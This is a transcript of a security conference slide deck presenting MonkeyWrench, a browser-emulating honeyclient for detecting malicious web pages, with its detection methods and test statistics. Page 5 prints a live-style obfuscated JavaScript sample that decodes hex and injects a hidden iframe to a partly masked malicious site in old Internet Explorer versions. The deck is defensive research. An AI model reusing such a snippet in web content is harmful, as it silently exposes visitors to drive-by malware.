detecting malicious web pages with monkeywrench

19
1 Detecting malicious web pages with MonkeyWrench Armin Büscher Developer / Malware Analyst @ G Data SecurityLabs [email protected]

Upload: others

Post on 03-Feb-2022

6 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Detecting malicious web pages with MonkeyWrench

1

Detecting malicious web pages with

MonkeyWrench

Armin Büscher

Developer / Malware Analyst

@ G Data SecurityLabs

[email protected]

Page 2: Detecting malicious web pages with MonkeyWrench

2

Agenda

• Malicious web pages

• MonkeyWrench

• Test runs

• monkeywrench.de

• Demo

• Future work

Page 3: Detecting malicious web pages with MonkeyWrench

3

Malicious web pages

• #1 infection vector of client computers

• Single visit of a malicious page can lead to

drive-by download of malware

Page 4: Detecting malicious web pages with MonkeyWrench

4

Malicious web pages:

Web exploit kits

Page 5: Detecting malicious web pages with MonkeyWrench

5

Malicious web pages:

Obfuscation<script>

var s='3C696672616D65207372633D22687474703A2F2F7777772E7669647

36E69636865732E636F6D2F746F702F7A2F7374617469632E7068703F73696

73D37373735373332383646364237353233363337373643334236413746374

437323444304334373439343522206865696768743D223222207374796C653

D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F6966726

16D653E';

var o='';

for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37);

o=o+c+s.substr(i,2);}

var v=navigator.appVersion;

if (v.indexOf('MSIE 6.0') != -1)

{document.write(unescape(o));}

if (v.indexOf('MSIE 5.') != -1)

{document.write(unescape(o));}

</script>

<iframe

src=http://www.vid******s.com/top/z/static.php?sig=777573286F6

B752363776C3B6A7F7D724D0C474945 height =“2”

style=“display:none” width=“2”></iframe>

Build a fast Honeyclient system to

automatically detect and analyze

the bulk of web attacks

Page 6: Detecting malicious web pages with MonkeyWrench

6

• Low-interaction Web-Honeyclient

• Diploma thesis (Computer Science)

• Research project @ G Data SecurityLabs

Page 7: Detecting malicious web pages with MonkeyWrench

7

Low-interaction

• Honeyclient↔ Client-Honeypot

• Connect to web servers & check pages for malicious

content

• High-interaction:

• Regular system (often virtualized) with client software

driven by Honeyclient

• Detection similar to malware sandbox implementations

• Low-interaction:

• Emulation of client software (→ browser)

Web-Honeyclient

Page 8: Detecting malicious web pages with MonkeyWrench

8

MonkeyWrench: Project Goals

• Inspect websites faster than high-interaction systems

• Emulate browsers to deal with:

• sophisticated obfuscation techniques

• browser-specific behavior

• Deep analysis of web-based attacks to identify:

• stages of an attack

• preparative techniques

• attacked vulnerabilities

Page 9: Detecting malicious web pages with MonkeyWrench

9

Page 10: Detecting malicious web pages with MonkeyWrench

10

MonkeyWrench: Client

• Written in Java

• Multithreading of emulated browser instances

• Utilizes HTMLUnit (htmlunit.sourceforge.net)

• “GUI-less browser for Java programs”

• Unit tests of web pages

• Possible emulated browsers:

• Microsoft Internet Explorer 6/7/8

• Mozilla Firefox 2/3

Page 11: Detecting malicious web pages with MonkeyWrench

11

MonkeyWrench: Client architecture

Page 12: Detecting malicious web pages with MonkeyWrench

12

MonkeyWrench: Detection

• Vulnerability modules

• ActiveX (e.g. emulation of a buffer overflow)

• Browser / DOM / static HTML analysis

• Shellcode

• GetPC heuristics

• WinAPI search loops

• Heapspray / NOP-Sleds

• Entropy

• Heap usage

• AV signatures

Page 13: Detecting malicious web pages with MonkeyWrench

13

Test runs: Setup

• Quad core system running Debian Linux

• DSL 3 Mbit/s & (since 04/2010) VDSL 50 Mbit/s

• Feeding the beast:

• Google Hot Trends (→BH SEO)

• Customer reports

• Links parsed from spam mails

• malwaredomainlist.com, malc0de.com, …

Page 14: Detecting malicious web pages with MonkeyWrench

14

Test runs: Numbers

• >1.3 million web pages checked (since 12/2009)

• max. # checked pages/hour ~ 2,200

(1.63 sec per check)

• 84,526 attacks detected

• 12 GB of malicious or suspicious samples

downloaded (HTML, JS, PDF, EXE, …)

• 23,618 malicious executables

(~24% undetected by AV signatures)

• 6,292 shellcode payloads extracted

Page 15: Detecting malicious web pages with MonkeyWrench

15

0

10

20

30

40

50

60

70

80

90

100

CVE-2010-0249 „Aurora“

Page 16: Detecting malicious web pages with MonkeyWrench

16

0 %

10 %

20 %

30 %

40 %

50 %

60 %

70 %

Nov-09 Dec-09 Jan-10 Feb-10 Mar-10 Apr-10

Attacked vulnerabilities

CVE-2007-3147

CVE-2008-0015

CVE-2008-1309

CVE-2008-2463

CVE-2009-1136

CVE-2010-0249

CVE-2010-0806

Malicious PDFs

Page 17: Detecting malicious web pages with MonkeyWrench

17

monkeywrench.de

• Free web service

• Analyze malicious web pages with MonkeyWrench

• Community partners are welcome!

Demo

Page 18: Detecting malicious web pages with MonkeyWrench

18

Future Work

• Integrate PDF analysis into monkeywrench.de

• Karsten Tellmann‘s PDX-Ray

• Integrate shellcode sandbox

• Flash module

Page 19: Detecting malicious web pages with MonkeyWrench

19

Thank you for your attention!

[email protected]